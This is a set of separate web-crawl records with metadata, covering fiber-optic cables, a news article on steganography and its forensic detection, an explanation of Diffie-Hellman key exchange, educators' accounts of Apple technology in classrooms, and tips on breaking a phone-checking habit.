Bulk fiber cables come in many different types, based on where it will be installed. You can find reliable bulk fiber cables on the Internet Market. For example, China fiber optic products supplier FiberStore supplies a wide range of optical fiber cable products including indoor cables, Outdoor Cables, FTTH Cables, Armored Cables, LSZH cables and some special cables. They’re diverse as Aerial Cables, Building Cables, direct buried cables, Duct Cables, Underwater/Submarine cables. Some of the ophthalmic fibers come with steel tube and steel wire armored, suitable for sea, lake and river applications. Only optical fiber that fits or exceeds industry standards can be used to make sure quality products with best-in-class performance. | <urn:uuid:e66b8110-4d7a-47f0-8b89-785cdb700f2f> | CC-MAIN-2017-04 | http://www.fs.com/blog/why-have-bulk-fiber-cables-been-the-backbone-in-networks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00494-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934584 | 705 | 2.75 | 3 |
Hidden in plain sight
Image and audio files can hold tomes of secrets
- By Patience Wait
- May 13, 2005
Steganography literally means 'covered writing.' A Greek term, it refers to hiding one message inside another. While the concept has been around for centuries, the marriage of computers and the Internet has brought it to fruition.
'This whole concept was created in the Middle East, and that part of the world has been practicing the method for millennia,' said Chet Hosmer, the FLETC session's instructor and CEO of WetStone Technologies Inc., a software company in Cortland, N.Y.
Both picture and audio files are ideal for containing hidden messages, he explained; they tend to be very large, and software that substitutes single bits of data at the end of an eight-bit packet creates differences so subtle they can't be detected by the human eye or ear.
'The Old Testament, the New Testament and all the works of Shakespeare can be hidden in one six-minute song,' Hosmer said. 'This is not a small covert channel.'
In steganography, or stego for short, the visible or audible message is called the carrier, he said, while the hidden message is the payload. Together they form the covert message.
The method has a big advantage over encryption as a way of transmitting messages, Hosmer said. Encrypted messages are visible; while they are encoded, there is no question that somone is trying to hide something.
Stego, on the other hand, is a classic example of hiding something in plain sight; one has to know to look for the hidden message. For instance, a payload could be hidden in a digital photo of an item that is going to be sold on an online auction site, where hundreds or thousands of people may look at it or download it. 'That way, you can hide who you were delivering the message to,' he said.
Hosmer's company has created software tools agents can use to look for the small clues that indicate a data file has been turned into a covert message. For instance, looking at the color palette used in a digital photo can reveal manipulation; a picture with a message hidden inside will have a more limited palette, with 'blocks' of colors close together. Examining a photo for hues, edges and shadows is another way to turn up traces of stego embedded in a photo file.
In an audio file, stego messages are frequently hidden in the seeming silence at the beginning of each song. By comparing the wave signature of the suspect file to a known clean copy of the song, one can see if additional information has been inserted.
There are other forms of steganography, such as ap- pending data at the end of a file, after the standard end-of-file marker. There also is word substitution; there are Web-based tools, for instance, that will mimic spam, encoding the real message as a spam e-mail.
'There are over 300 stego programs now available. In 2000, there were only about 50''one indication of how popular this method has become for conveying secret information, Hosmer said. For instance, law enforcement agents are now finding the use of stego in gang Web sites.
'We are still catching up with the bad guys,' he said. 'We're worried about programs we haven't seen before. We're developing a mathematical model of 'normal' files' to improve the search process. | <urn:uuid:b2130190-17ce-402d-8a1a-1c9d017f1b95> | CC-MAIN-2017-04 | https://gcn.com/articles/2005/05/13/hidden-in-plain-sight.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00402-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938278 | 722 | 2.734375 | 3 |
Diffie-Hellman is a key exchange protocol developed by Diffie and Hellman (imagine that) in 1976. The purpose of Diffie-Hellman is to allow two entities to exchange a secret over a public medium without having anything shared beforehand. As it turns out, this is an extremely important function, and understanding how Diffie-Hellman accomplishes this should be a point of interest for any information security enthusiast.
Two values, called Diffie-Hellman parameters, are at the core of this protocol, and they consist of a very large prime number
p, and a second related “generator” number that is smaller than
g. The value for
g is tied very strongly to its associated
p value. The nature of this relationship is that for each number
n, there is a power
g such that
n = g^k % p.
Each host must agree on these two parameters (
g) in order for the protocol to work. Finally, a third and private value, called
x is also generated for each host. This value, unlike
g, is not shared.
Public values (to be exchanged with each other) are then generated with this function:
y = g^x % p
…or in other words, take value
g and raise it to the power of value
x, divide that by
p, and your remainder is your public value
y. Then, the two parties exchange their
y‘s with each other and the exchanged numbers are used to create the shared secret
z as follows:
z = y^x % p
…or, take the exchanged public key
y and raise it to the power of your private key
x, and divide that by the shared value
p. The shared secret,
z, is the remainder of that operation.
The beauty of Diffie-Hellman is that after each party does this independently, they will both end up with the exact same value for
z!. This means they now have an outstanding key for whatever encryption algorithm they decide on using for the rest of their communication.
This works because:
z= (g^x % p)^x' % p = (g^x' % p)^x % p
Note that the portion of the equation above in parenthesis is the other host’s “public key”, and that it has the other host’s private value in it. This is what makes the arrival at a mutual secret possible mathematically.
So here’s how it breaks down:
- Exchange some numbers over a public medium
- Create your own private number that won’t be exchanged
- Generate a public “key” from the previously agreed upon numbers combined with your private value
- Perform a calculation using their public, your private, and the shared information
- Your result will match that of your partner doing the same thing
- You now have a shared secret without it ever crossing the public medium!
…or in other words, take the exchanged public key ‘y’ and raise it to the power of your private key ‘x’, and divide that by the shared value ‘p’. The shared secret, ‘z’, is the remainder of that operation.
The beauty of Diffie-Hellman is that both parties will end up with the same value for ‘z’! And ‘z’ makes an outstanding key for whatever encryption algorithm they decide on using for the rest of their communication.
This works because:
z = (g^x % p)^x' % p = (g^x' % p)^x % p
The key concept here is that the portion of the equation above in parenthesis is the other host’s public key. Notice that it has the other host’s private value in it. That’s what makes the attainment of a mutual secret possible mathematically.
The magic of Diffie-Hellman is that you not only end up with a shared secret, but the secret is never sent over the wire. Each side comes up with it independently, and that’s what makes the protocol so beautiful. | <urn:uuid:63139a4a-a37a-4fd6-87e9-7c2d7823c764> | CC-MAIN-2017-04 | https://danielmiessler.com/study/diffiehellman/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00338-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926453 | 885 | 4.15625 | 4 |
Our Apple in the classroom series continues with six more educators explaining how Apple technology has helped shape teaching and learning, and what their favorite Apple technology in the classroom is and why.
Lucy Gray, Education Consultant at Lucy Gray Consulting @elemenous
Global collaboration: creating an eBook with students from 20 other countries.
One of the best examples showing how Apple has transformed learning is the “If You Learned Here” Project, according to education consultant Lucy Gray. She had presented at an Apple Distinguished School meeting on global connections, and two teachers Mary Morgan Ryan and Carolyn Skibba went back to their classrooms to design their own collaborative project. In the end, it involved 70 schools from 20 countries using a myriad of tools, including Flipgrid, Padlet and Book Creator to pull together a collaborative eBook written by students from around the world. The project offers “a great example of how educators can bring the world into their classrooms,” adds Gray.
What’s her favorite Apple Technology? iTunes U, as it offers a repository of mostly free content for all levels of education. “There is a treasure trove of material within iTunes U including videos, podcasts, iBooks, and other digital documents. Colleges and universities, K12 schools, and institutions of informal learning have created channels showcasing great resources for others,” says Gray. "Also, iTunes U Course Manager is available for those who want to build their own collections of content. My favorite channel on iTunes U is the Apple Distinguished Educator channel!"
Scott Newcomb, Fourth Grade Teacher at St. Mary’s Intermediate School and Blogger/Consultant for The Mobile Native @SNewco
Using apps to offer discrete, individualized instruction for fourth grade math students.
“Apple has transformed learning by increasing mobility, collaboration and creativity,” says Scott Newcomb, a fourth grade teacher and blogger/consultant. Having iPad Minis in his classroom has had a huge impact on his students: “Their learning is no longer tethered to their desks. It has leveled the playing field. All students feel that they can contribute to the activity.”
Specifically, Newcomb has his students use math apps on the iPad Mini to sharpen their skills. He also incorporates blended learning by having the students use online math programs to differentiate instruction.
The technology is great for him because it enables Newcomb to individualize and differentiate instruction through these apps, as well as tailor instruction to fit each of his student’s individual needs. “Through the integration of iPad Minis, I am able to differentiate instruction without drawing attention to specific students, as all will be working on the same type of device,” he adds.
Daniel Edwards, Director at Stephen Perse Foundation schools, Co-author of Educate 1-to-1 @syded06
Just tap twice for a media-rich learning experience on the big screen.
Daniel Edwards is director at Stephen Perse Foundation schools and co-author of Educate 1-to-1. His schools work on two key principles when using technology to enhance learning: providing seamless access to content and removing barriers to learning.
In terms of achieving the former, the schools use iTunes U as the content delivery mechanism. For the latter, they offer a 1-to-1 iPad environment to provide students with instant access to materials they need. Using the iPad, “students can now receive feedback on their assignments and act on it before their next 'contact' period with the teacher,” he says. “We see this as a crucial aspect in our desire to enhance the learning process.”
The iPad has greatly changed Edward’s approach to teaching by offering a media-rich platform coupled with access to student information and feedback – all available with “a couple of taps on a screen.” By pairing this with the Apple TV, Edwards says he is free to teach and address individual concerns more readily, “It used to be so difficult five years ago to do the things I've always wanted to do. And now I just tap a screen.”
Terry Heick, Founder/Director of TeachThought.com @terryheick
Apps are the new textbook, and we’re nowhere near our potential.
“While the iPad hardware is impressive, Apple was way, way out ahead of competing platforms in fostering the growth of high-quality, innovative, and polished apps,” states Terry Heick, founder and director of TeachThought.com. And while this hasn't ‘transformed’ learning, it has created a compelling alternative to the textbook, made project-based learning more accessible, and began to illuminate what's possible with mobile learning. He adds, “we're nowhere near our potential here, either.”
Heick believes that the iPad is probably the best thing Apple has created, as he says that BYOD is not something most schools and districts are comfortable with. “So even while the iPad seems to kind of hit a wall in terms of sales, by empowering students, it wins,” explains Heick.
Laura Blankenship, Chair and Dean of Academic Affairs at The Baldwin School @lblanken
Students demonstrate learned concepts by creating movies about robots and binary code.
Laura Blankenship is chair and dean at The Baldwin School, which became a 1-to-1 MacBook school two years ago. “I have to say, it has transformed so many of our classes,” she states. The biggest result Blankenship has seen is that learning is now less passive, as teachers now have students actively shape their own learning. By using e-texts and online resources for classroom materials, the school has also expanded the kinds of materials it uses and is no longer stuck with static textbooks, “which can get out of date far too quickly,” says Blankenship.
She enthusiastically calls out iMovie as her favorite Apple technology, adding, “there are so many ways this can be used for students to demonstrate what they know, and it's such a flexible platform that students are really only limited by their imagination.”
In the classroom, her students use iMovie to create videos to demonstrate the concepts they've learned, even in computer science. Examples include how-to videos for making robots sing or draw, and explanations of the binary number system. Blankenship explains, “Because they can easily add video, photos and music all together, students can easily make many different kinds of videos. The end results are never boring!”
Tablets for the win: enabling intuitive and easy student learning.
“My favorite Apple technology is the iPad because the tablets are intuitive and easy to use for students,” says Beth Blecherman of Techmamas. Her sixth graders integrated iPads into their curriculum this year with wide success, making it a “transformative year.”
For other classrooms looking to do the same, Blecherman recommends leveraging an infrastructure of automated tools to help with your school’s internal communication. “We had that this year and all teachers participated which made the school workflow very efficient. I commend the staff at our Middle School for the work they did to bring the technology and workflow into the classroom in a way that enriched the kids’ learning environment and made the workflow more organized,” says Blecherman. | <urn:uuid:61a216e7-740e-403a-912b-ede41c440217> | CC-MAIN-2017-04 | https://www.jamf.com/blog/how-has-apple-transformed-your-classroom-part-ii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00246-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961444 | 1,531 | 3 | 3 |
Cell phones are ubiquitous and so is the sight of people staring into them while doing something else - waiting in line, driving a car, walking into a pole and so forth.
The Boston Globe reports that phone-checking has become a major - and in the case of texting while driving, deadly - habit.
"Our phones have effectively programmed us with new habits, including a powerful urge to pull them out when we’re not supposed to," notes writer Leon Netfakh.
What causes that urge? Simply put, habit. We are programming ourselves to pick them up constantly. These habits are caused by triggers - an action, thought or feeling that lead to another specific act, in this case, checking your phone.
Think about it: If you have it programmed to vibrate or emit a sound when you receive a text message or e-mail, there's your trigger. You hear the sound or feel the haptic feedback and that triggers your brain to pick up and scan your phone.
However, you may be picking up your phone repeatedly even without such an obvious trigger. Netfakh cites a study in which participants were given smartphones for 6 weeks. The phones were loaded with usage tracking software, which revealed the more than 130 subjects "pulled out their devices for very brief periods up to 60 times per day."
If you're triggered by sounds or vibration, habit-breaking is easy: set your notifications to mute. But how does one battle the habit of incessant phone checking in other instances? Netfakh argues: "fight habit with habit."
In this case, treat phone-checking like any other bad habit you're trying to break.
Step 1: Identify what's triggering your urge to check your phone.
Step 2: Develop another response to the trigger to circumvent unnecessary or excessive phone usage.
Say, for instance, you realize you constantly check your phone while driving. You assess the situation and realize you do so because you're bored, stuck in traffic, etc. In this case, you can create a new habit by leaving your phone in your trunk, in the back seat or anywhere not in arm's reach.
Click below for more ideas on creating new habits. | <urn:uuid:b406c4bc-435b-4796-bb73-60f3aced15b2> | CC-MAIN-2017-04 | http://www.itworld.com/article/2705368/careers/how-to-stop-checking-your-phone-every-5-seconds.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00364-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948223 | 450 | 2.53125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.